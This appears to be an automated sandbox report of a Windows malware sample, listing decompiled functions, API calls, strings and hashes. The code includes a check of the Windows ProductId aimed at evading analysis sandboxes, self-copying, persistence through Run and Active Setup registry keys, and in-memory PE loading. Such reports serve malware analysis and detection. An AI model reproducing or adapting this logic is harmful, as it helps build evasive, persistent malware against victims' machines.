                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-337-8429955-22614") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272); // executed
                                    				return _t15;
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • ProductId, xrefs: 004054DB
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				intOrPtr* _t106;
                                    				intOrPtr* _t107;
                                    				intOrPtr* _t108;
                                    				intOrPtr* _t109;
                                    				intOrPtr* _t110;
                                    				void* _t112;
                                    				void* _t126;
                                    				intOrPtr* _t143;
                                    				void* _t154;
                                    				void* _t166;
                                    				CHAR* _t169;
                                    				int _t172;
                                    				int _t186;
                                    				intOrPtr* _t190;
                                    				intOrPtr* _t191;
                                    				intOrPtr* _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr* _t198;
                                    				void* _t200;
                                    				void* _t201;
                                    				intOrPtr* _t204;
                                    				intOrPtr* _t218;
                                    				intOrPtr* _t226;
                                    				intOrPtr* _t240;
                                    				intOrPtr* _t248;
                                    				intOrPtr* _t258;
                                    				intOrPtr* _t272;
                                    				intOrPtr* _t284;
                                    				intOrPtr _t301;
                                    				intOrPtr* _t313;
                                    				void* _t314;
                                    				intOrPtr* _t315;
                                    				intOrPtr* _t317;
                                    				void* _t321;
                                    				intOrPtr* _t332;
                                    				intOrPtr _t333;
                                    				intOrPtr* _t334;
                                    				intOrPtr* _t338;
                                    				char _t340;
                                    				intOrPtr _t351;
                                    				CHAR* _t392;
                                    				CHAR* _t394;
                                    				intOrPtr _t396;
                                    				intOrPtr _t397;
                                    				void* _t402;
                                    
                                    				_t393 = __esi;
                                    				_t391 = __edi;
                                    				_t396 = _t397;
                                    				_t314 = 0xf;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t314 = _t314 - 1;
                                    				} while (_t314 != 0);
                                    				_push(_t314);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_t313 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t396);
                                    				_push(0x407061);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t397;
                                    				E00401B14(_t313, _v8);
                                    				_t106 =  *0x40d1f0; // 0x40e890
                                    				_t399 =  *_t106;
                                    				if( *_t106 != 0) {
                                    					_t107 =  *0x40d1f0; // 0x40e890
                                    					__eflags =  *_t107 - 1;
                                    					if(__eflags != 0) {
                                    						_t108 =  *0x40d1f0; // 0x40e890
                                    						__eflags =  *_t108 - 2;
                                    						if(__eflags != 0) {
                                    							_t109 =  *0x40d1f0; // 0x40e890
                                    							__eflags =  *_t109 - 3;
                                    							if(__eflags != 0) {
                                    								_t110 =  *0x40d218; // 0x40e894
                                    								_t112 = E00401D50( *_t110);
                                    								_t332 =  *0x40d218; // 0x40e894
                                    								_t333 =  *_t332;
                                    								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
                                    								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
                                    									_t301 =  *0x40d218; // 0x40e894
                                    									E00401D58(_t301, 0x407078);
                                    								}
                                    								_t334 =  *0x40d218; // 0x40e894
                                    								E00401B58( &_v12,  *_t334);
                                    								E00401CAC( &_v28, E00401F48(_v12));
                                    								E00406684(_v28, _t313, __eflags);
                                    							} else {
                                    								E004061DC( &_v12, _t313, __esi, __eflags);
                                    							}
                                    						} else {
                                    							E00406034( &_v12, _t313, __eflags);
                                    						}
                                    					} else {
                                    						E00405F7C( &_v12, _t313, __eflags);
                                    					}
                                    				} else {
                                    					E00405EF0( &_v12, _t313, _t399);
                                    				}
                                    				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t338 =  *0x40d208; // 0x40e898
                                    				E00401D58( &_v12,  *_t338);
                                    				_t126 = E00401D50(_v12);
                                    				_t340 = _v12;
                                    				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
                                    				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t315 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v16,  *_t315, _v12);
                                    				E00401CAC( &_v32, E00401F48(_v12));
                                    				E00406684(_v32, _t313, _t401); // executed
                                    				E00401CAC( &_v36, E00401F48(_v16));
                                    				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
                                    				E00405BEC( &_v40, _t313, _t393, _t401); // executed
                                    				_push(_v40);
                                    				_push(0x407078);
                                    				_t143 =  *0x40d208; // 0x40e898
                                    				_push( *_t143);
                                    				E00401E10();
                                    				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
                                    				if(_t402 != 0) {
                                    					E00401D58( &_v20, 0x407078);
                                    				}
                                    				_t317 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v24,  *_t317, _v20);
                                    				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
                                    				_push(_v44);
                                    				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
                                    				_pop(_t154);
                                    				E00401E94(_t154, _v48);
                                    				if(_t402 == 0) {
                                    					L21:
                                    					E00401B14(_t313, _v8);
                                    					goto L40;
                                    				} else {
                                    					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
                                    					_push(_v52);
                                    					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
                                    					_pop(_t166);
                                    					E00401E94(_t166, _v56);
                                    					if(_t402 != 0) {
                                    						_t169 = E00401F48(_v16);
                                    						_t394 = E00401F48(_v8);
                                    						_t172 = CopyFileA(_t394, _t169, 0); // executed
                                    						__eflags = _t172 - 1;
                                    						asm("sbb eax, eax");
                                    						__eflags = _t172 + 1 - 1;
                                    						if(_t172 + 1 != 1) {
                                    							E00401CAC( &_v60, E00401F48(_v20));
                                    							E00406684(_v60, _t313, __eflags);
                                    							_t392 = E00401F48(_v24);
                                    							E00401CAC( &_v64, _t392);
                                    							E00405A28(_v64, _t313, _t392, _t394, __eflags);
                                    							_t186 = CopyFileA(_t394, _t392, 0);
                                    							__eflags = _t186 - 1;
                                    							asm("sbb eax, eax");
                                    							__eflags = _t186 + 1 - 1;
                                    							if(_t186 + 1 != 1) {
                                    								E00401B14(_t313, _v8);
                                    							} else {
                                    								E00401B14(_t313, _v24);
                                    							}
                                    						} else {
                                    							E00401B14(_t313, _v16);
                                    						}
                                    						_t190 =  *0x40d1ec; // 0x40e8ac
                                    						__eflags =  *_t190;
                                    						if( *_t190 != 0) {
                                    							_t248 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v72, E00401F48( *_t248));
                                    							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0); // executed
                                    							E00401E94(_v68,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v76, E00401F48( *_t313));
                                    								_t284 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v80, E00401F48( *_t284));
                                    								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76); // executed
                                    							}
                                    							_t258 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v88, E00401F48( *_t258));
                                    							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0); // executed
                                    							E00401E94(_v84,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v92, E00401F48( *_t313));
                                    								_t272 =  *0x40d1ec; // 0x40e8ac
                                    								E00401CAC( &_v96, E00401F48( *_t272));
                                    								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
                                    							}
                                    						}
                                    						_t191 =  *0x40d1d8; // 0x40e8a4
                                    						__eflags =  *_t191;
                                    						if( *_t191 != 0) {
                                    							_t226 =  *0x40d1d8; // 0x40e8a4
                                    							E00401CAC( &_v104, E00401F48( *_t226));
                                    							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0); // executed
                                    							E00401E94(_v100,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v108, E00401F48( *_t313));
                                    								_t240 =  *0x40d1d8; // 0x40e8a4
                                    								E00401CAC( &_v112, E00401F48( *_t240));
                                    								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
                                    							}
                                    						}
                                    						_t192 =  *0x40d1e0; // 0x40e8a8
                                    						__eflags =  *_t192;
                                    						if( *_t192 != 0) {
                                    							_t204 =  *0x40d1e0; // 0x40e8a8
                                    							E00401CAC( &_v120, E00401F48( *_t204));
                                    							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0); // executed
                                    							E00401E94(_v116,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v124, E00401F48( *_t313));
                                    								_t218 =  *0x40d1e0; // 0x40e8a8
                                    								E00401CAC( &_v128, E00401F48( *_t218));
                                    								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
                                    							}
                                    						}
                                    						_t193 =  *0x40d1e4; // 0x40e8a0
                                    						__eflags =  *_t193;
                                    						if( *_t193 != 0) {
                                    							_push(0x4070fc);
                                    							_push(E00406840(1));
                                    							_push(E00401F48( *_t313));
                                    							_t198 =  *0x40d1e4; // 0x40e8a0
                                    							_t200 = E00401F48( *_t198);
                                    							_pop(_t321);
                                    							_pop(_t201); // executed
                                    							E00406ADC(_t201, _t321, _t200, __eflags); // executed
                                    						}
                                    						L40:
                                    						_pop(_t351);
                                    						 *[fs:eax] = _t351;
                                    						_push(E00407068);
                                    						return E00401AE4( &_v128, 0x1f);
                                    					}
                                    					goto L21;
                                    				}
                                    			}

                                    Instruction address column for the listing above (0x00406b54 to 0x00407060, one address per statement) omitted.

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                    				void* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				void* _t26;
                                    				intOrPtr _t27;
                                    				void* _t28;
                                    				void* _t43;
                                    				intOrPtr _t53;
                                    				intOrPtr _t54;
                                    				intOrPtr _t62;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t43 = __ecx;
                                    				_push(_t62);
                                    				_push(0x40698a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62;
                                    				E00401CAC( &_v16, __edx);
                                    				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                                    				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0); // executed
                                    				E00401CAC( &_v20, _t43);
                                    				_t26 = E00401D50(_v20);
                                    				_t27 =  *0x40d090; // 0x0
                                    				_t28 = E00401D50(_t27);
                                    				E00401CAC( &_v24, _t43);
                                    				_t53 =  *0x40d090; // 0x0
                                    				E00401D58( &_v24, _t53);
                                    				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28); // executed
                                    				RegCloseKey(_v8);
                                    				_pop(_t54);
                                    				 *[fs:eax] = _t54;
                                    				_push(E00406991);
                                    				return E00401AE4( &_v24, 4);
                                    			}

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: 206985d672d90e257182974d08c54b0c86a2f00840113c06cdb0cefdbad86c8c
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: 206985d672d90e257182974d08c54b0c86a2f00840113c06cdb0cefdbad86c8c
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 31%
                                    			E004019D8() {
                                    				struct HINSTANCE__* _t24;
                                    				intOrPtr _t32;
                                    				void* _t42;
                                    
                                    				if( *0x0040E5BC != 0 ||  *0x40e024 == 0) {
                                    					L3:
                                    					if( *0x40d004 != 0) {
                                    						 *0x40d068();
                                    					}
                                    					L5:
                                    					while(1) {
                                    						if( *((char*)(0x40e5bc)) == 2 &&  *0x40d000 == 0) {
                                    							 *0x0040E5A0 = 0;
                                    						}
                                    						 *0x40d030();
                                    						if( *((char*)(0x40e5bc)) <= 1 ||  *0x40d000 != 0) {
                                    							if( *0x0040E5A4 != 0) {
                                    								 *0x40d01c();
                                    								_t32 =  *((intOrPtr*)(0x40e5a4));
                                    								_t7 = _t32 + 0x10; // 0x0
                                    								_t24 =  *_t7;
                                    								_t8 = _t32 + 4; // 0x400000
                                    								if(_t24 !=  *_t8 && _t24 != 0) {
                                    									FreeLibrary(_t24);
                                    								}
                                    							}
                                    						}
                                    						 *0x40d034();
                                    						if( *((char*)(0x40e5bc)) == 1) {
                                    							 *0x0040E5B8();
                                    						}
                                    						if( *((char*)(0x40e5bc)) != 0) {
                                    							E004019A8();
                                    						}
                                    						if( *0x40e594 == 0) {
                                    							if( *0x40e014 != 0) {
                                    								 *0x40e014();
                                    							}
                                    							ExitProcess( *0x40d000); // executed
                                    						}
                                    						memcpy(0x40e594,  *0x40e594, 0xb << 2);
                                    						_t42 = _t42 + 0xc;
                                    						0x40d000 = 0x40d000;
                                    					}
                                    				} else {
                                    					do {
                                    						 *0x40e024 = 0;
                                    						 *((intOrPtr*)( *0x40e024))();
                                    					} while ( *0x40e024 != 0);
                                    					goto L3;
                                    				}
                                    			}

                                    APIs
                                    • FreeLibrary.KERNEL32(00400000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A54
                                    • ExitProcess.KERNEL32(00000000,?,?,00000002,00401AB2,004011FF,00401247,?,?,?,?,?,?,00402E1B,?), ref: 00401A8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitFreeLibraryProcess
                                    • String ID: @&@$@&@$D0@
                                    • API String ID: 1404682716-1618351410
                                    • Opcode ID: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction ID: 5263b8d098c20f51001af61e3d55436e18b8afc55997b24df4f1e0aa037ee43b
                                    • Opcode Fuzzy Hash: 559209a951da750523f00a8a55e47858a0990535697d94cc46877384b3987aa0
                                    • Instruction Fuzzy Hash: 4521AF70A022418FEB209FA5C9887537BE5AF44318F284476D848AA2E2C77CCCC5CF5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00403EC0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				long _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				void* _v48;
                                    				signed int _v52;
                                    				long _v56;
                                    				char _v60;
                                    				void* _t116;
                                    				void* _t121;
                                    				void* _t135;
                                    				intOrPtr _t138;
                                    				void* _t150;
                                    				void* _t175;
                                    				signed int _t184;
                                    				signed int _t185;
                                    				intOrPtr _t189;
                                    				intOrPtr _t197;
                                    				intOrPtr _t204;
                                    				intOrPtr _t205;
                                    				signed int _t209;
                                    				signed int _t210;
                                    				void* _t213;
                                    				void* _t216;
                                    				intOrPtr* _t217;
                                    
                                    				_t208 = __edi;
                                    				_t215 = _t216;
                                    				_t217 = _t216 + 0xffffffc8;
                                    				_push(__edi);
                                    				_v44 = __ecx;
                                    				_t183 = __edx;
                                    				_v40 = __eax;
                                    				_t197 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v36, _t197);
                                    				_push(_t216);
                                    				_push(0x4040ba);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t217;
                                    				_push(0);
                                    				_push(_v44);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
                                    				_t116 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1); // executed
                                    				_v16 = _t116;
                                    				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                    				_t121 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4); // executed
                                    				_v48 = _t121;
                                    				E00401258(_v44,  *(_v8 + 0x54), _v48);
                                    				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56); // executed
                                    				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
                                    				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t135 >= 0) {
                                    					_v60 = _t135 + 1;
                                    					_t185 = 0;
                                    					do {
                                    						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
                                    						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
                                    						if(_t208 < _v52) {
                                    							_t210 = _t208 ^ _v52;
                                    							_v52 = _v52 ^ _t210;
                                    							_t208 = _t210 ^ _v52;
                                    						}
                                    						_t175 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4); // executed
                                    						_v48 = _t175;
                                    						E00401414(_v48, _t208);
                                    						E00401258( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
                                    						_t185 = _t185 + 1;
                                    						_t66 =  &_v60;
                                    						 *_t66 = _v60 - 1;
                                    					} while ( *_t66 != 0);
                                    				}
                                    				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                    				_v28 = _t138;
                                    				_v24 = _t138;
                                    				_v36 = _v16;
                                    				_v32 =  *(_v8 + 0x50);
                                    				_push(0);
                                    				E00402FBC();
                                    				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
                                    				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                    					E00403D08(_t145 + _v16, _t215);
                                    				}
                                    				_t147 =  *((intOrPtr*)(_v8 + 0x80));
                                    				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
                                    					E00403D84(_t147 + _v16, _t183, _t208, _t213, _t215); // executed
                                    				}
                                    				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t150 >= 0) {
                                    					_v60 = _t150 + 1;
                                    					_t184 = 0;
                                    					do {
                                    						_t209 = _t184 + _t184 * 4;
                                    						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E00403C98( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56); // executed
                                    						_t184 = _t184 + 1;
                                    						_t101 =  &_v60;
                                    						 *_t101 = _v60 - 1;
                                    					} while ( *_t101 != 0);
                                    				}
                                    				_t189 =  *0x4037bc; // 0x4037c0
                                    				E00402704(_a4, _t189,  &_v36);
                                    				_pop(_t204);
                                    				 *[fs:eax] = _t204;
                                    				_push(E004040C1);
                                    				_t205 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v36, _t205);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 00403F17
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F3D
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403F67
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 00403FBF
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 00404082
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction ID: b04bee7947df74310e6e8ccd123ea0b1f62a61930ae828744bf4897096846573
                                    • Opcode Fuzzy Hash: 551762122f1815908c531378ade1b61ffac38d8ef792ece962969a478a327540
                                    • Instruction Fuzzy Hash: C371D475A00208AFCB10DFA9D981EAEB7F8FF48314F15856AE905F7391D634EA04CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
                                    				void* _v8;
                                    				char* _t7;
                                    				void** _t11;
                                    
                                    				_t7 = __edx;
                                    				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11); // executed
                                    				RegDeleteKeyA(_v8, _t7); // executed
                                    				return RegCloseKey(_v8);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
